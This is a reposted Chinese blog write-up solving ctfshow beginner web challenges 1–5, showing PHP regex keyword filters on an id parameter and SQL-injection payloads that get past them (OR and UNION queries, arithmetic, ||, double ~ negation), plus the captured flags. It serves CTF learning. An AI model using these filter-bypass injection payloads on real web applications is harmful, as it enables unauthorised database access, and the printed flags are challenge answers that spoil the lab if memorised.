码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • ctfshow萌新计划web1-5(正则匹配绕过)


    目录

    web1

    web2

    web3

    web4

    web5


    web1

    题目注释相当于已经审计了代码

    存在一个对id的检测,并且告诉我们flag在id=100

     这里讲三个方法

    (1)payload:?id=10*100

    (2)使用or来绕过 

    payload:?id=-1 or id=1000

    (3)联合注入查询

    payload:?id=1 union select * from article --+

    ctfshow{f9909e52-140d-4ed5-a1f3-6643378b6198}

    web2

    只是增加了下面这段代码,preg_match函数进行正则匹配,限制了我们使用 or 和 + 

    1. if(preg_match("/or|\+/i",$id)){
    2. die("id error");
    3. }

    使用payload:?id=10*100

    成功获取flag

    ctfshow{d15e0676-50aa-4bff-a09f-484e92c7b5bc} 

    web3

    这次匹配过滤掉了更多的东西

    1. if(preg_match("/or|\-|\\|\*|\<|\>|\!|x|hex|\+/i",$id)){
    2. die("id error");
    3. }

    加减乘都被过滤了,但是没有过滤除

    构造payload:?id=1/0.001

    虽然or被过滤了,但是我们可以使用符号来表示或运算,即||

    构造payload:?id=0 || id=1000

    这里也没有过滤~,我们可以进行两次取反

    构造payload:?id=~~1000

    ctfshow{6ff66b11-bf8e-482b-b870-c52d1be27ccc} 

    web4

    这次把除也过滤掉了,以及过滤掉了其他的一些符号

    1. if(preg_match("/or|\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
    2. die("id error");
    3. }

    但是对我们给的另外两个payload并不影响

    /?id=0 || id=1000

    ?id=~~1000

    ctfshow{798eb84c-cd75-430f-b475-1574ff3756f5} 

    web5

    这次过滤的更多...但是它还是舍不得过滤~~~

    1. if(preg_match("/\'|\"|or|\||\-|\\\|\/|\\*|\<|\>|\!|x|hex|\(|\)|\+|select/i",$id)){
    2. die("id error");
    3. }

     继续使用payload:?id=~~1000

    拿到flag

    ctfshow{76afbf63-7e57-4992-b87c-b8bbc97f32d0} 

  • 相关阅读:
    React项目实战之租房app项目(六)渲染房源列表&axios优化&封装顶部搜索栏&列表找房模块之条件筛选
    Leetcode641 实现双端队列
    servlet -> spring-mvc -> spring-boot-> spring-security目录
    编译原理网课笔记——第一章
    Revit SDK:StairsAutomation
    [附源码]计算机毕业设计springboot校园招聘系统设计
    没有谷歌翻译,我该怎么办?
    PDF文档如何解密?3个软件值得收藏
    y106.第六章 微服务、服务网格及Envoy实战 -- 可观测应用之指标和日志(十七)
    Eclipse中打包maven项目-war包方式
  • 原文地址:https://blog.csdn.net/Myon5/article/details/133777899
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号